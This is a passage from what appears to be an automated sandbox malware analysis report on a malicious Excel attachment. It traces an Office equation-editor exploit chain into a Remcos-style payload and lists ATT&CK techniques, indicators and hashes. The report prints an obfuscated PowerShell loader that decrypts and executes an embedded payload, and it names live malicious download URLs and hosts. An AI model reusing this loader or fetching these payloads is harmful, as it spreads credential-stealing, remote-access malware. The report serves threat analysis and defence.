'+'cniifj5td9o95cjerd65qs8cgd6mkhdfxu5knhunuhv8en0bizzo6xyspuor/nanj9+k8dnwkvszljh8/jdtcblce7jwblipbyns69fmvryo8riat/ocm+86avfem+js7xh93ssl6airsk1e4+mg3y/ys93bkwl7qe/oiifd0sr1fm9xzheyuwuhy/au8ffhxtesmpl/yzzj+erhvh+barxv063xruudd/czk/at2cd+nbgzfgfdj29bcydli2htao5px2joifcvb02gojnag2swau3s/c6hfnqhbjgguvrutxmletl29tntcgqa0tuwol3eukx7wxbg0i6w0i89mn4k+5nr4k2ak8apbfvox2kvv5tano47cej4qtglf3mt0splqwz9jreu64mqqkkvdzo84oqaoq+hkz5+76ssvuvplvpnwt4wap3/vlkfcfvdax6petauqlmo7enf3jzdxlsvbi7+npzvpr8flnbqizzlimiogkvr17bpas5cpyjnw/spi74gnlfkh3qds0ulhmze/la2ja5mjup7w5kwxvshb7os7tlshsyn7pc/qbynvi6phl80r558jq+epf/jw5jd2cmqieq4mv2u7ehxt/brtg1g9p22aeim3ofkuv8q/sbtotp/20jvrjq8wjrpm/rpy0qrrdkidxmhoj8d6rmtrqvnlhz+qu80dqhyy621x7hrhp/chezyeyqzwymruuzd7owzm8rgeunb1tzcnvux5eyvo7nu46ipcnfuuoeq7bdkkpw3s8if+x6isuilksnxqglgoiq/3uqx1kt5knk+ige6rsunzht35yevyq39sinjmced7uwj/p5rw4psemzzxql/er7kgeb/ga2laverkwiuezrf3odu4fwu5pnqaqjkibik2wsd3hqq6eldbzdplyjniiorffgtexsuy6oe4me8krjwdhfpmrwuygsixhjbrs984mgz6l5vb7m2/1oziu1cr0qrdzy3k3vsr+enkjmt7qgpst+tbaem6n1xrxx9yzupzht3jk7ls4ahtilod1mmxwuifungqbkc9keityszskxixzugswplqk0zinu0elprdi1qwf3ph5fgpgbnrotsh2bxgal6kv70rllimhcb/8n7+zv4j3xquvj7ypmsgavk4cpp2kc0q2qbsv7eqwdektcm8lho0uj59axofd0v7z0vxaotnn5mo4lmiysm7kuwnx/7betkclqsfm4mxexf6te/5nneogtkpdrxwffl4mvtkv5tmtopwm/iw/h9086xnqd1jcqfra3dwaq9h6+rtfgxhwbllv/h2mbx+g3rk+am8fjxjelv3vz/qwk0o2atk8nsmzyzcdfcop03b9h/ier7se0sp/s6mlr/0wuzt7cmapkp/cnpz0fc/0tv0xj8nlgvvqqvk1zz/zxqq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni53245645968011423739588623973337cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniifj5td9o95cjerd65qs8cgd6mkhdfxu5knhunuhv8en0bizzo6xyspuor/nanj9+k8dnwkvszljh8/jdtcblce7jwblipbyns69fmvryo8riat/ocm+86avfem+js7xh93ssl6airsk1e4+mg3y/ys93bkwl7qe/oiifd0sr1fm9xzheyuwuhy/au8ffhxtesmpl/yzzj+erhvh+barxv063xruudd/czk/at2cd+nbgzfgfdj29bcydli2htao5px2joifcvb02gojnag2swau3s/c6hfnqhbjgguvrutxmletl29tntcgqa0tuwol3eukx7wxbg0i6w0i89mn4k+5nr4k2ak8apbfvox2kvv5tano47cej4qtglf3mt0splqwz9jreu64mqqkkvdzo84oqaoq+hkz5+76ssvuvplvpnwt4wap3/vlkfcfvdax6petauqlmo7enf3jzdxlsvbi7+npzvpr8flnbqizzlimiogkvr17bpas5cpyjnw/spi74gnlfkh3qds0ulhmze/la2ja5mjup7w5kwxvshb7os7tlshsyn7pc/qbynvi6phl80r558jq+epf/jw5jd2cmqieq4mv2u7ehxt/brtg1g9p22aeim3ofkuv8q/sbtotp/20jvrjq8wjrpm/rpy0qrrdkidxmhoj8d6rmtrqvnlhz+qu80dqhyy621x7hrhp/chezyeyqzwymruuzd7owzm8rgeunb1tzcnvux5eyvo7nu46ipcnfuuoeq7bdkkpw3s8if+x6isuilksnxqglgoiq/3uqx1kt5knk+ige6rsunzht35yevyq39sinjmced7uwj/p5rw4psemzzxql/er7kgeb/ga2laverkwiuezrf3odu4fwu5pnqaqjkibik2wsd3hqq6eldbzdplyjniiorffgtexsuy6oe4me8krjwdhfpmrwuygsixhjbrs984mgz6l5vb7m2/1oziu1cr0qrdzy3k3vsr+enkjmt7qgpst+tbaem6n1xrxx9yzupzht3jk7ls4ahtilod1mmxwuifungqbkc9keityszskxixzugswplqk0zinu0elprdi1qwf3ph5fgpgbnrotsh2bxgal6kv70rllimhcb/8n7+zv4j3xquvj7ypmsgavk4cpp2kc0q2qbsv7eqwdektcm8lho0uj59axofd0v7z0vxaotnn5mo4lmiysm7kuwnx/7betkclqsfm4mxexf6te/5nneogtkpdrxwffl4mvtkv5tmtopwm/iw/h9086xnqd1jcqfra3dwaq9h6+rtfgxhwbllv/h2mbx+g3rk+am8fjxjelv3vz/qwk0o2atk8nsmzyzcdfcop03b9h/ier7se0sp/s6mlr/0wuzt7cmapkp/cnpz0fc/0tv0xj8nlgvvqqvk1zz/zxqq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information131
              Scripting
              Valid Accounts211
              Command and Scripting Interpreter
              1
              Browser Extensions
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              Process Discovery
              Remote Services11
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts43
              Exploitation for Client Execution
              131
              Scripting
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              LSASS Memory21
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell
              1
              DLL Side-Loading
              Logon Script (Windows)11
              Process Injection
              Security Account Manager1
              Application Window Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Remote System Discovery
              Distributed Component Object ModelInput Capture113
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Obfuscated Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482813 Sample: #U00d6DEME TAVS#U0130YES#U0... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 43 tny.wtf 2->43 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 20 other signatures 2->59 9 EXCEL.EXE 57 37 2->9         started        signatures3 process4 dnsIp5 47 tny.wtf 188.114.97.3, 49165, 49167, 49168 CLOUDFLARENETUS European Union 9->47 49 192.227.225.166, 49166, 49170, 49172 AS-COLOCROSSINGUS United States 9->49 31 #U00d6DEME TAVS#U0...ES#U0130.xls (copy), Composite 9->31 dropped 33 createdsimplething...lwayssheismy[1].doc, Rich 9->33 dropped 13 WINWORD.EXE 336 37 9->13         started        18 wscript.exe 1 9->18         started        file6 process7 dnsIp8 51 tny.wtf 13->51 35 C:\Users\user\AppData\Roaming\...\tny.wtf.url, MS 13->35 dropped 37 C:\Users\user\AppData\Roaming\...\4Gs.url, MS 13->37 dropped 39 ~WRF{3F1E4F80-4A4D...0-2CB2A855073D}.tmp, Composite 13->39 dropped 41 C:\Users\user\AppData\Local\...\C63FEFCD.doc, Rich 13->41 dropped 67 Microsoft Office launches external ms-search protocol handler (WebDAV) 13->67 69 Office viewer loads remote template 13->69 71 Microsoft Office drops suspicious files 13->71 20 EQNEDT32.EXE 12 13->20         started        73 Suspicious powershell command line found 18->73 75 Wscript starts Powershell (via cmd or directly) 18->75 77 Obfuscated command line found 18->77 79 3 other signatures 18->79 24 powershell.exe 12 5 18->24         started        file9 signatures10 process11 dnsIp12 29 C:\Users\...\simplebeautygirlfrndhaveform.vBS, Unicode 20->29 dropped 61 Office equation editor establishes network connection 20->61 63 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 20->63 45 198.46.176.133, 49171, 80 AS-COLOCROSSINGUS United States 24->45 65 Suspicious execution chain found 24->65 27 RegAsm.exe 24->27         started        file13 signatures14 process15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              #U00d6DEME TAVS#U0130YES#U0130.xls32%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
              #U00d6DEME TAVS#U0130YES#U0130.xls100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp100%AviraEXP/CVE-2017-11882.Gen
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C63FEFCD.doc100%AviraHEUR/Rtf.Malformed
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://go.microsoft.cU0%Avira URL Cloudsafe
              http://tny.wtf/0%Avira URL Cloudsafe
              http://192.227.225.1660%Avira URL Cloudsafe
              http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
              http://tny.wtf/4GsyX0%Avira URL Cloudsafe
              http://192.227.225.166/36/RYND.txt0%Avira URL Cloudsafe
              wemberdag.duckdns.org100%Avira URL Cloudmalware
              http://192.227.225.166/36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.doc100%Avira URL Cloudmalware
              http://192.227.225.166/36/simplebeautygirlfrndhaveforme.gIFj0%Avira URL Cloudsafe
              http://tny.wtf/4Gs0%Avira URL Cloudsafe
              http://198.46.176.1330%Avira URL Cloudsafe
              http://192.227.225.166/36/simplebeautygirlfrndhaveforme.gIF0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              tny.wtf
              188.114.97.3
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://198.46.176.133/Upload/vbs.jpegfalse
                • Avira URL Cloud: malware
                unknown
                http://192.227.225.166/36/RYND.txttrue
                • Avira URL Cloud: safe
                unknown
                wemberdag.duckdns.orgtrue
                • Avira URL Cloud: malware
                unknown
                http://192.227.225.166/36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.doctrue
                • Avira URL Cloud: malware
                unknown
                http://tny.wtf/4Gsfalse
                • Avira URL Cloud: safe
                unknown
                http://192.227.225.166/36/simplebeautygirlfrndhaveforme.gIFtrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://tny.wtf/tny.wtf.url.3.drfalse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://go.microsoft.cUpowershell.exe, 00000009.00000002.446403842.00000000001CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://192.227.225.166powershell.exe, 00000009.00000002.452136835.00000000081C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gp/Cpowershell.exe, 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://tny.wtf/4GsyX~DF796D981FE2E9145A.TMP.0.dr, F0630000.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000009.00000002.447875101.00000000033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://192.227.225.166/36/simplebeautygirlfrndhaveforme.gIFjEQNEDT32.EXE, 00000007.00000002.430940411.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.447762696.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://198.46.176.133powershell.exe, 00000009.00000002.447762696.00000000024CA000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                188.114.97.3
                tny.wtfEuropean Union
                13335CLOUDFLARENETUStrue
                192.227.225.166
                unknownUnited States
                36352AS-COLOCROSSINGUStrue
                198.46.176.133
                unknownUnited States
                36352AS-COLOCROSSINGUSfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482813
                Start date and time:2024-07-26 08:23:16 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:#U00d6DEME TAVS#U0130YES#U0130.xls
                renamed because original name is a hash value
                Original Sample Name:DEME TAVSYES.xls
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLS@9/29@6/3
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 82%
                • Number of executed functions: 15
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                • Execution Graph export aborted for target EQNEDT32.EXE, PID 3248 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: #U00d6DEME TAVS#U0130YES#U0130.xls
                TimeTypeDescription
                02:24:42API Interceptor47x Sleep call for process: EQNEDT32.EXE modified
                02:24:44API Interceptor29x Sleep call for process: powershell.exe modified
                02:24:44API Interceptor7x Sleep call for process: wscript.exe modified
                InputOutput
                URL: Office document Model: gpt-4o
                ```json
                {
                  "riskscore": 9,
                  "reasons": "The screenshot shows a visually prominent Microsoft Office logo with the text 'This document is protected' which can mislead users into thinking the document is legitimate. The instructions on the right side create a sense of urgency by directing the user to 'Enable Content' to view the document. This is a common tactic used in phishing attacks to trick users into enabling macros, which can then execute malicious code. Additionally, the use of the Microsoft Office branding impersonates a well-known and trusted brand, further increasing the likelihood of the user being deceived. The combination of these elements strongly suggests that the document could be malicious."
                }
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.97.3Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                • downloaddining2.com/h9fmdW6/index.php
                Quotation.exeGet hashmaliciousFormBookBrowse
                • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                • www.whatareyoucraving.com/drbb/
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/vMCQY
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                irlsever.docGet hashmaliciousFormBookBrowse
                • www.ninunveiled.shop/y2xs/
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/3VC
                198.46.176.133042240724.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                greatbunfeelsoftandhoney.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                ogetback.docGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9942.6374.rtfGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                XrAADcYten.rtfGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                iWRmEn1DDT.rtfGet hashmaliciousRemcosBrowse
                • 198.46.176.133/Upload/vbs.jpeg
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                tny.wtfAVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                54.xlsGet hashmaliciousFormBookBrowse
                • 188.114.97.3
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUS6Vm1Ii4ASz.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                ynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                http://lotsa.pplanr.comGet hashmaliciousUnknownBrowse
                • 104.21.44.162
                2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                • 104.26.2.16
                http://leostop.comGet hashmaliciousUnknownBrowse
                • 104.16.141.114
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                https://odc.officeapps.live.com.mcas.ms/odc/v2.1/hrd?rs=en-US&Ver=16&app=111&p=6&hm=0&fpEnabled=1&McasTsid=REDACTEDGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                AS-COLOCROSSINGUSBilseMHALF.rtfGet hashmaliciousUnknownBrowse
                • 172.245.123.11
                2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                • 198.46.174.139
                DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                • 107.174.69.116
                LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
                • 108.174.60.238
                042240724.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133
                LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133
                greatbunfeelsoftandhoney.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133
                AS-COLOCROSSINGUSBilseMHALF.rtfGet hashmaliciousUnknownBrowse
                • 172.245.123.11
                2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                • 198.46.174.139
                DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                • 107.174.69.116
                LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
                • 108.174.60.238
                042240724.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133
                LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133
                greatbunfeelsoftandhoney.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133
                No context
                No context
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.0255371792752877
                Encrypted:false
                SSDEEP:6:I3DPcNjNp3avxggLRdbNdAgnRXv//4tfnRujlw//+GtluJ/eRuj:I3DPsNFcJrAghvYg3J/
                MD5:A2988C9BB513879F0EDF037D4461E5C8
                SHA1:8D0B9049E1330C4700CD4FBEA6FCF8F602D81D64
                SHA-256:2DBCCFDFC42FEF69E08EBB630D0459A0A27831A7AA5E867891B464C1F6AD4B60
                SHA-512:0B3E983BDD91FE63DF1CAD8BC9EC3EB222E21F3A51D2E3F5FE8A3AC57D1AF5767F7A018043FE773138B398E204000882313DAA9548A4AEC58440A30DEAEC2648
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z.....h.M.....O.lS,...X.F...Fa.q............................_....=.M..,6...M.............ME.G|4..t......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):4760
                Entropy (8bit):4.834060479684549
                Encrypted:false
                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                MD5:838C1F472806CF4BA2A9EC49C27C2847
                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                Malicious:false
                Reputation:moderate, very likely benign file
